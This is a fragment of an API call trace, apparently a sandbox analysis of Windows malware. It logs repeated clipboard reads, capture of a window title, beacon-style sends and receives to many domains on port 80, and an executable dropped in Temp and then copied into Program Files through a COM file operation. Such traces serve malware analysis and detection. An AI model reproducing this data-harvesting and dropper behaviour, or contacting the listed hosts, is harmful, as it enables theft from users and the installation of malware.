ai_addr=0x3ea8980*(sa_family=2, sin_port=0x50, sin_addr="204.11.56.48"), ai_next=0x0)) returned 0 [0133.546] connect (s=0xaf4, name=0x3ea8980*(sa_family=2, sin_port=0x50, sin_addr="204.11.56.48"), namelen=16) returned 0 [0133.685] RtlIntegerToChar (in: Value=0x2a8, Base=0x0, Length=0x8, String=0x7acf848 | out: String="680") returned 0x0 [0133.685] send (s=0xaf4, buf=0x79d6f32*, len=1206, flags=0) returned 1206 [0133.686] closesocket (s=0xaf4) returned 0 [0133.686] socket (af=2, type=1, protocol=6) returned 0xaf4 [0133.686] connect (s=0xaf4, name=0x3ea8980*(sa_family=2, sin_port=0x50, sin_addr="204.11.56.48"), namelen=16) returned 0 [0133.891] send (s=0xaf4, buf=0x79f4332*, len=176, flags=0) returned 176 [0133.892] setsockopt (s=0xaf4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0133.892] recv (in: s=0xaf4, buf=0x82b2d6c, len=2048000, flags=0 | out: buf=0x82b2d6c*) returned 25578 [0134.433] closesocket (s=0xaf4) returned 0 [0134.433] Sleep (dwMilliseconds=0x1388) [0134.441] OpenClipboard (hWndNewOwner=0x0) returned 1 [0134.441] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0134.441] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0134.441] GlobalUnlock (hMem=0x3b59e0) returned 1 [0134.441] CloseClipboard () returned 1 [0134.441] socket (af=2, type=1, protocol=6) returned 0xaf4 [0134.442] getaddrinfo (in: pNodeName="www.jspagnier-graveur.com", pServiceName="80", pHints=0x7c60498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c604c8 | out: ppResult=0x7c604c8*=0x7c33100*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3ea8700*(sa_family=2, sin_port=0x50, sin_addr="23.20.208.181"), ai_next=0x7c33180*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3ea84a0*(sa_family=2, sin_port=0x50, sin_addr="54.85.93.188"), ai_next=0x0))) returned 0 [0134.573] connect (s=0xaf4, name=0x3ea8700*(sa_family=2, sin_port=0x50, sin_addr="23.20.208.181"), namelen=16) returned 0 [0134.675] RtlIntegerToChar (in: Value=0x2a8, Base=0x0, Length=0x8, String=0x7acf848 | out: String="680") returned 0x0 [0134.675] send (s=0xaf4, buf=0x79d6f32*, len=1215, flags=0) returned 1215 [0134.676] closesocket (s=0xaf4) returned 0 [0134.676] socket (af=2, type=1, protocol=6) returned 0xaf4 [0134.676] connect (s=0xaf4, name=0x3ea8700*(sa_family=2, sin_port=0x50, sin_addr="23.20.208.181"), namelen=16) returned 0 [0134.780] send (s=0xaf4, buf=0x79f4332*, len=179, flags=0) returned 179 [0134.781] setsockopt (s=0xaf4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0134.781] recv (in: s=0xaf4, buf=0x82b2d6c, len=2048000, flags=0 | out: buf=0x82b2d6c*) returned 5474 [0134.910] closesocket (s=0xaf4) returned 0 [0134.912] Sleep (dwMilliseconds=0x1388) [0134.925] OpenClipboard (hWndNewOwner=0x0) returned 1 [0134.926] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0134.926] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0134.926] GlobalUnlock (hMem=0x3b59e0) returned 1 [0134.926] CloseClipboard () returned 1 [0134.926] socket (af=2, type=1, protocol=6) returned 0xaf4 [0134.927] getaddrinfo (in: pNodeName="www.single-on-purpose.com", pServiceName="80", pHints=0x7c60838*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c60868 | out: ppResult=0x7c60868*=0x7c330c0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3ea8500*(sa_family=2, sin_port=0x50, sin_addr="192.0.78.24"), ai_next=0x7c32a40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3ea8620*(sa_family=2, sin_port=0x50, sin_addr="192.0.78.25"), ai_next=0x0))) returned 0 [0134.946] connect (s=0xaf4, name=0x3ea8500*(sa_family=2, sin_port=0x50, sin_addr="192.0.78.24"), namelen=16) returned 0 [0134.965] RtlIntegerToChar (in: Value=0x2a8, Base=0x0, Length=0x8, String=0x7acf848 | out: String="680") returned 0x0 [0134.965] send (s=0xaf4, buf=0x79d6f32*, len=1215, flags=0) returned 1215 [0134.965] closesocket (s=0xaf4) returned 0 [0134.966] socket (af=2, type=1, protocol=6) returned 0xaf4 [0134.966] connect (s=0xaf4, name=0x3ea8500*(sa_family=2, sin_port=0x50, sin_addr="192.0.78.24"), namelen=16) returned 0 [0135.003] send (s=0xaf4, buf=0x79f4332*, len=179, flags=0) returned 179 [0135.003] setsockopt (s=0xaf4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0135.003] recv (in: s=0xaf4, buf=0x82b2d6c, len=2048000, flags=0 | out: buf=0x82b2d6c*) returned 480 [0135.192] closesocket (s=0xaf4) returned 0 [0135.193] Sleep (dwMilliseconds=0x1388) [0135.205] OpenClipboard (hWndNewOwner=0x0) returned 1 [0135.205] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0135.206] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0135.206] GlobalUnlock (hMem=0x3b59e0) returned 1 [0135.206] CloseClipboard () returned 1 [0135.206] socket (af=2, type=1, protocol=6) returned 0xaf4 [0135.206] getaddrinfo (in: pNodeName="www.totalselfconfidence.net", pServiceName="80", pHints=0x7c60bd8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c60c08 | out: ppResult=0x7c60c08*=0x7c32840*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7b46330*(sa_family=2, sin_port=0x50, sin_addr="156.239.192.219"), ai_next=0x0)) returned 0 [0135.466] connect (s=0xaf4, name=0x7b46330*(sa_family=2, sin_port=0x50, sin_addr="156.239.192.219"), namelen=16) returned 0 [0135.819] RtlIntegerToChar (in: Value=0x2a8, Base=0x0, Length=0x8, String=0x7acf848 | out: String="680") returned 0x0 [0135.819] send (s=0xaf4, buf=0x79d6f32*, len=1221, flags=0) returned 1221 [0135.819] closesocket (s=0xaf4) returned 0 [0135.820] socket (af=2, type=1, protocol=6) returned 0xaf4 [0135.820] connect (s=0xaf4, name=0x7b46330*(sa_family=2, sin_port=0x50, sin_addr="156.239.192.219"), namelen=16) returned 0 [0136.185] send (s=0xaf4, buf=0x79f4332*, len=181, flags=0) returned 181 [0136.185] setsockopt (s=0xaf4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0136.185] recv (in: s=0xaf4, buf=0x82b2d6c, len=2048000, flags=0 | out: buf=0x82b2d6c) returned 0 [0136.540] closesocket (s=0xaf4) returned 0 [0136.541] Sleep (dwMilliseconds=0x1388) [0136.547] OpenClipboard (hWndNewOwner=0x0) returned 1 [0136.547] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0136.547] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0136.548] GlobalUnlock (hMem=0x3b59e0) returned 1 [0136.548] CloseClipboard () returned 1 [0136.548] socket (af=2, type=1, protocol=6) returned 0xaf4 [0136.548] getaddrinfo (in: pNodeName="www.medicalmanagementinc.info", pServiceName="80", pHints=0x7c60f78*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c60fa8 | out: ppResult=0x7c60fa8*=0x0) returned 11001 [0136.924] getaddrinfo (in: pNodeName="www.medicalmanagementinc.info", pServiceName="80", pHints=0x7c60f78*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c60fa8 | out: ppResult=0x7c60fa8*=0x0) returned 11001 [0136.925] Sleep (dwMilliseconds=0x1388) [0136.937] OpenClipboard (hWndNewOwner=0x0) returned 1 [0136.937] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0136.937] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0136.937] GlobalUnlock (hMem=0x3b59e0) returned 1 [0136.937] CloseClipboard () returned 1 [0136.937] socket (af=2, type=1, protocol=6) returned 0x1174 [0136.938] getaddrinfo (in: pNodeName="www.babybox.media", pServiceName="80", pHints=0x7c61318*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c61348 | out: ppResult=0x7c61348*=0x0) returned 11001 [0136.977] getaddrinfo (in: pNodeName="www.babybox.media", pServiceName="80", pHints=0x7c61318*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c61348 | out: ppResult=0x7c61348*=0x0) returned 11001 [0136.977] Sleep (dwMilliseconds=0x1388) [0136.984] OpenClipboard (hWndNewOwner=0x0) returned 1 [0136.984] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0136.984] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0136.984] GlobalUnlock (hMem=0x3b59e0) returned 1 [0136.984] CloseClipboard () returned 1 [0136.984] socket (af=2, type=1, protocol=6) returned 0x1240 [0136.985] getaddrinfo (in: pNodeName="www.wenyuexuan.com", pServiceName="80", pHints=0x7c616b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c616e8 | out: ppResult=0x7c616e8*=0x0) returned 11001 [0149.131] getaddrinfo (in: pNodeName="www.wenyuexuan.com", pServiceName="80", pHints=0x7c616b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c616e8 | out: ppResult=0x7c616e8*=0x0) returned 11001 [0161.217] Sleep (dwMilliseconds=0x1388) [0161.254] OpenClipboard (hWndNewOwner=0x0) returned 1 [0161.254] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0161.254] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0161.254] GetForegroundWindow () returned 0x1029a [0161.254] GetWindowTextW (in: hWnd=0x1029a, lpString=0x79ce2b2, nMaxCount=260 | out: lpString="Rise Entire") returned 11 [0161.279] GlobalUnlock (hMem=0x3b59e0) returned 1 [0161.279] CloseClipboard () returned 1 [0161.319] socket (af=2, type=1, protocol=6) returned 0xbd4 [0161.321] getaddrinfo (in: pNodeName="www.livinglovinglincoln.com", pServiceName="80", pHints=0x7c61a58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c61a88 | out: ppResult=0x7c61a88*=0x7c32200*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7b45670*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), ai_next=0x0)) returned 0 [0161.355] connect (s=0xbd4, name=0x7b45670*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0161.412] RtlIntegerToChar (in: Value=0x37c, Base=0x0, Length=0x8, String=0x7acf848 | out: String="892") returned 0x0 [0161.413] send (s=0xbd4, buf=0x79d6f32*, len=1433, flags=0) returned 1433 [0161.425] closesocket (s=0xbd4) returned 0 [0161.427] socket (af=2, type=1, protocol=6) returned 0xbd4 [0161.428] connect (s=0xbd4, name=0x7b45670*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0161.451] send (s=0xbd4, buf=0x79f4332*, len=181, flags=0) returned 181 [0161.454] setsockopt (s=0xbd4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0161.454] recv (in: s=0xbd4, buf=0x82b2d6c, len=2048000, flags=0 | out: buf=0x82b2d6c*) returned 461 [0161.589] closesocket (s=0xbd4) returned 0 [0161.589] Sleep (dwMilliseconds=0x1388) [0161.601] OpenClipboard (hWndNewOwner=0x0) returned 1 [0161.601] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0161.601] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0161.601] GlobalUnlock (hMem=0x3b59e0) returned 1 [0161.601] CloseClipboard () returned 1 [0161.601] socket (af=2, type=1, protocol=6) returned 0xbd4 [0161.601] getaddrinfo (in: pNodeName="www.bjjinmei.com", pServiceName="80", pHints=0x7c61df8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c61e28 | out: ppResult=0x7c61e28*=0x7c32580*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7b456d0*(sa_family=2, sin_port=0x50, sin_addr="154.205.217.133"), ai_next=0x0)) returned 0 [0162.574] connect (s=0xbd4, name=0x7b456d0*(sa_family=2, sin_port=0x50, sin_addr="154.205.217.133"), namelen=16) returned 0 [0162.751] RtlIntegerToChar (in: Value=0x37c, Base=0x0, Length=0x8, String=0x7acf848 | out: String="892") returned 0x0 [0162.751] send (s=0xbd4, buf=0x79d6f32*, len=1400, flags=0) returned 1400 [0162.751] closesocket (s=0xbd4) returned 0 [0162.752] socket (af=2, type=1, protocol=6) returned 0xbd4 [0162.752] connect (s=0xbd4, name=0x7b456d0*(sa_family=2, sin_port=0x50, sin_addr="154.205.217.133"), namelen=16) returned 0 [0162.930] send (s=0xbd4, buf=0x79f4332*, len=170, flags=0) returned 170 [0162.930] setsockopt (s=0xbd4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0162.930] recv (in: s=0xbd4, buf=0x82b2d6c, len=2048000, flags=0 | out: buf=0x82b2d6c*) returned 2290 [0163.145] closesocket (s=0xbd4) returned 0 [0163.146] Sleep (dwMilliseconds=0x1388) [0163.161] OpenClipboard (hWndNewOwner=0x0) returned 1 [0163.161] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0163.162] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0163.162] GlobalUnlock (hMem=0x3b59e0) returned 1 [0163.162] CloseClipboard () returned 1 [0163.162] socket (af=2, type=1, protocol=6) returned 0xbd4 [0163.162] getaddrinfo (in: pNodeName="www.murdabudz.com", pServiceName="80", pHints=0x7c62198*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c621c8 | out: ppResult=0x7c621c8*=0x7c35580*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7b45930*(sa_family=2, sin_port=0x50, sin_addr="160.153.136.3"), ai_next=0x0)) returned 0 [0163.186] connect (s=0xbd4, name=0x7b45930*(sa_family=2, sin_port=0x50, sin_addr="160.153.136.3"), namelen=16) returned 0 [0163.206] RtlIntegerToChar (in: Value=0x37c, Base=0x0, Length=0x8, String=0x7acf848 | out: String="892") returned 0x0 [0163.206] send (s=0xbd4, buf=0x79d6f32*, len=1403, flags=0) returned 1403 [0163.206] closesocket (s=0xbd4) returned 0 [0163.206] socket (af=2, type=1, protocol=6) returned 0xbd4 [0163.207] connect (s=0xbd4, name=0x7b45930*(sa_family=2, sin_port=0x50, sin_addr="160.153.136.3"), namelen=16) returned 0 [0163.232] send (s=0xbd4, buf=0x79f4332*, len=171, flags=0) returned 171 [0163.233] setsockopt (s=0xbd4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0163.233] recv (in: s=0xbd4, buf=0x82b2d6c, len=2048000, flags=0 | out: buf=0x82b2d6c*) returned 47 [0163.272] closesocket (s=0xbd4) returned 0 [0163.273] Sleep (dwMilliseconds=0x1388) [0163.285] OpenClipboard (hWndNewOwner=0x0) returned 1 [0163.286] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0163.286] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0163.286] GlobalUnlock (hMem=0x3b59e0) returned 1 [0163.286] CloseClipboard () returned 1 [0163.286] socket (af=2, type=1, protocol=6) returned 0xbd4 [0163.286] getaddrinfo (in: pNodeName="www.simpeltattofor.men", pServiceName="80", pHints=0x7c62538*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c62568 | out: ppResult=0x7c62568*=0x7c32540*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7b45750*(sa_family=2, sin_port=0x50, sin_addr="103.224.182.210"), ai_next=0x0)) returned 0 [0163.792] connect (s=0xbd4, name=0x7b45750*(sa_family=2, sin_port=0x50, sin_addr="103.224.182.210"), namelen=16) returned 0 [0163.963] RtlIntegerToChar (in: Value=0x37c, Base=0x0, Length=0x8, String=0x7acf848 | out: String="892") returned 0x0 [0163.963] send (s=0xbd4, buf=0x79d6f32*, len=1418, flags=0) returned 1418 [0163.963] closesocket (s=0xbd4) returned 0 [0163.963] socket (af=2, type=1, protocol=6) returned 0xbd4 [0163.964] connect (s=0xbd4, name=0x7b45750*(sa_family=2, sin_port=0x50, sin_addr="103.224.182.210"), namelen=16) returned 0 [0164.135] send (s=0xbd4, buf=0x79f4332*, len=176, flags=0) returned 176 [0164.135] setsockopt (s=0xbd4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0164.135] recv (in: s=0xbd4, buf=0x82b2d6c, len=2048000, flags=0 | out: buf=0x82b2d6c*) returned 454 [0164.471] closesocket (s=0xbd4) returned 0 [0164.472] Sleep (dwMilliseconds=0x1388) [0164.489] OpenClipboard (hWndNewOwner=0x0) returned 1 [0164.489] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0164.490] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0164.490] GlobalUnlock (hMem=0x3b59e0) returned 1 [0164.490] CloseClipboard () returned 1 [0165.771] socket (af=2, type=1, protocol=6) returned 0xbd4 [0165.772] getaddrinfo (in: pNodeName="www.1971event.com", pServiceName="80", pHints=0x7c5eed8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c5ef08 | out: ppResult=0x7c5ef08*=0x7c324c0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7b45730*(sa_family=2, sin_port=0x50, sin_addr="35.206.96.200"), ai_next=0x0)) returned 0 [0165.779] connect (s=0xbd4, name=0x7b45730*(sa_family=2, sin_port=0x50, sin_addr="35.206.96.200"), namelen=16) returned 0 [0165.912] send (s=0xbd4, buf=0x79f4332*, len=165, flags=0) returned 165 [0165.913] setsockopt (s=0xbd4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0165.913] recv (in: s=0xbd4, buf=0x82b2d6c, len=2048000, flags=0 | out: buf=0x82b2d6c*) returned 540 [0166.070] closesocket (s=0xbd4) returned 0 [0166.071] Sleep (dwMilliseconds=0x1388) [0166.078] OpenClipboard (hWndNewOwner=0x0) returned 1 [0166.078] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0166.078] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0166.078] GlobalUnlock (hMem=0x3b59e0) returned 1 [0166.078] CloseClipboard () returned 1 [0166.078] socket (af=2, type=1, protocol=6) returned 0xbd4 [0166.078] getaddrinfo (in: pNodeName="www.corlora.com", pServiceName="80", pHints=0x7c5f278*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c5f2a8 | out: ppResult=0x7c5f2a8*=0x7c32280*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7b45a50*(sa_family=2, sin_port=0x50, sin_addr="23.227.38.74"), ai_next=0x0)) returned 0 [0166.081] connect (s=0xbd4, name=0x7b45a50*(sa_family=2, sin_port=0x50, sin_addr="23.227.38.74"), namelen=16) returned 0 [0166.099] RtlIntegerToChar (in: Value=0x37c, Base=0x0, Length=0x8, String=0x7acf848 | out: String="892") returned 0x0 [0166.099] send (s=0xbd4, buf=0x79d6f32*, len=1397, flags=0) returned 1397 [0166.099] closesocket (s=0xbd4) returned 0 [0166.099] socket (af=2, type=1, protocol=6) returned 0xbd4 [0166.100] connect (s=0xbd4, name=0x7b45a50*(sa_family=2, sin_port=0x50, sin_addr="23.227.38.74"), namelen=16) returned 0 [0166.121] send (s=0xbd4, buf=0x79f4332*, len=163, flags=0) returned 163 [0166.121] setsockopt (s=0xbd4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0166.121] recv (in: s=0xbd4, buf=0x82b2d6c, len=2048000, flags=0 | out: buf=0x82b2d6c*) returned 5770 [0166.201] closesocket (s=0xbd4) returned 0 [0166.202] Sleep (dwMilliseconds=0x1388) [0166.203] OpenClipboard (hWndNewOwner=0x0) returned 1 [0166.203] GetClipboardData (uFormat=0xd) returned 0x3b59e0 [0166.203] GlobalLock (hMem=0x3b59e0) returned 0x3b59e0 [0166.203] GlobalUnlock (hMem=0x3b59e0) returned 1 [0166.203] CloseClipboard () returned 1 [0166.203] socket (af=2, type=1, protocol=6) returned 0xbd4 [0166.203] getaddrinfo (in: pNodeName="www.noun-bug.com", pServiceName="80", pHints=0x7c5f618*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7c5f648 | out: ppResult=0x7c5f648*=0x7c325c0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7b45fb0*(sa_family=2, sin_port=0x50, sin_addr="162.0.213.105"), ai_next=0x0)) returned 0 [0166.218] connect (s=0xbd4, name=0x7b45fb0*(sa_family=2, sin_port=0x50, sin_addr="162.0.213.105"), namelen=16) returned 0 [0166.391] RtlIntegerToChar (in: Value=0x37c, Base=0x0, Length=0x8, String=0x7acf848 | out: String="892") returned 0x0 [0166.391] send (s=0xbd4, buf=0x79d6f32*, len=1400, flags=0) returned 1400 [0166.392] Sleep (dwMilliseconds=0x7d0) [0166.410] closesocket (s=0xbd4) returned 0 [0166.410] socket (af=2, type=1, protocol=6) returned 0xbd4 [0166.410] connect (s=0xbd4, name=0x7b45fb0*(sa_family=2, sin_port=0x50, sin_addr="162.0.213.105"), namelen=16) returned 0 [0166.587] send (s=0xbd4, buf=0x79f4332*, len=170, flags=0) returned 170 [0166.588] Sleep (dwMilliseconds=0x7d0) [0166.594] setsockopt (s=0xbd4, level=65535, optname=4102, optval="¸\x0b", optlen=4) returned 0 [0166.594] recv (in: s=0xbd4, buf=0x7f3b56c, len=2048000, flags=0 | out: buf=0x7f3b56c*) returned 458 [0166.844] recv (in: s=0xbd4, buf=0x7f3b736, len=2047542, flags=0 | out: buf=0x7f3b736) returned 0 [0166.844] closesocket (s=0xbd4) returned 0 [0166.844] Sleep (dwMilliseconds=0x1388) [0166.865] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x7acf7e0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.869] NtCreateFile (in: FileHandle=0x7acf780, DesiredAccess=0x120089, ObjectAttributes=0x7acf7f0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x7acf790, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x7acf780*=0xffffffffffffffff, IoStatusBlock=0x7acf790*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0166.884] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x7acf700 | out: HeapArray=0x7acf700*=0x300000) returned 0x11 [0166.884] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x7b7f3d0) returned 1 [0166.884] CreateDirectoryW (lpPathName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Cmrkpgp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\cmrkpgp"), lpSecurityAttributes=0x0) returned 1 [0166.890] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x7acf350, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.890] NtCreateFile (in: FileHandle=0x7acf2f0, DesiredAccess=0x12019f, ObjectAttributes=0x7acf360*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x7acf300, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x7acf2f0*=0xbd4, IoStatusBlock=0x7acf300*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0166.891] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x7acf270 | out: HeapArray=0x7acf270*=0x300000) returned 0x11 [0166.891] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x7b7f3d0) returned 1 [0166.895] NtQueryInformationFile (in: FileHandle=0xbd4, IoStatusBlock=0x7acf300, FileInformation=0x7acf310, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x7acf300, FileInformation=0x7acf310) returned 0x0 [0166.899] NtWriteFile (in: FileHandle=0xbd4, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x7acf300, Buffer=0x813796c*, Length=0x100000, ByteOffset=0x7acf2f8*=0, Key=0x0 | out: IoStatusBlock=0x7acf300, Buffer=0x813796c*) returned 0x0 [0166.976] NtClose (Handle=0xbd4) returned 0x0 [0166.995] CoInitializeEx (pvReserved=0x0, dwCoInit=0x6) returned 0x0 [0166.995] CoCreateInstance (in: rclsid=0x79caaf6*(Data1=0x3ad05575, Data2=0x8857, Data3=0x4850, Data4=([0]=0x92, [1]=0x77, [2]=0x11, [3]=0xb8, [4]=0x5b, [5]=0xdb, [6]=0x8e, [7]=0x9)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x79cab06*(Data1=0x947aab5f, Data2=0xa5c, Data3=0x4c13, Data4=([0]=0xb4, [1]=0xd6, [2]=0x4b, [3]=0xf7, [4]=0x83, [5]=0x6f, [6]=0xc9, [7]=0xf8)), ppv=0x7acf850 | out: ppv=0x7acf850*=0x3dbde70) returned 0x0 [0167.003] FileOperation:IFileOperation:SetOperationFlags (This=0x3dbde70, dwOperationFlags=0x10840414) returned 0x0 [0167.003] SHCreateItemFromParsingName (in: pszPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Cmrkpgp", pbc=0x0, riid=0x79caae6*(Data1=0x43826d1e, Data2=0xe718, Data3=0x42ee, Data4=([0]=0xbc, [1]=0x55, [2]=0xa1, [3]=0xe2, [4]=0x61, [5]=0xc3, [6]=0x7b, [7]=0xfe)), ppv=0x7acf868 | out: ppv=0x7acf868*=0x7d97ca8) returned 0x0 [0167.087] SHCreateItemFromParsingName (in: pszPath="C:\\Program Files (x86)", pbc=0x0, riid=0x79caae6*(Data1=0x43826d1e, Data2=0xe718, Data3=0x42ee, Data4=([0]=0xbc, [1]=0x55, [2]=0xa1, [3]=0xe2, [4]=0x61, [5]=0xc3, [6]=0x7b, [7]=0xfe)), ppv=0x7acf860 | out: ppv=0x7acf860*=0x7d96888) returned 0x0 [0167.089] FileOperation:IFileOperation:CopyItem (This=0x3dbde70, psiItem=0x7d97ca8, psiDestinationFolder=0x7d96888, pszCopyName="Cmrkpgp", pfopsItem=0x0) returned 0x0 [0167.127] FileOperation:IFileOperation:PerformOperations (This=0x3dbde70) returned 0x0 [0177.103] FileOperation:IUnknown:Release 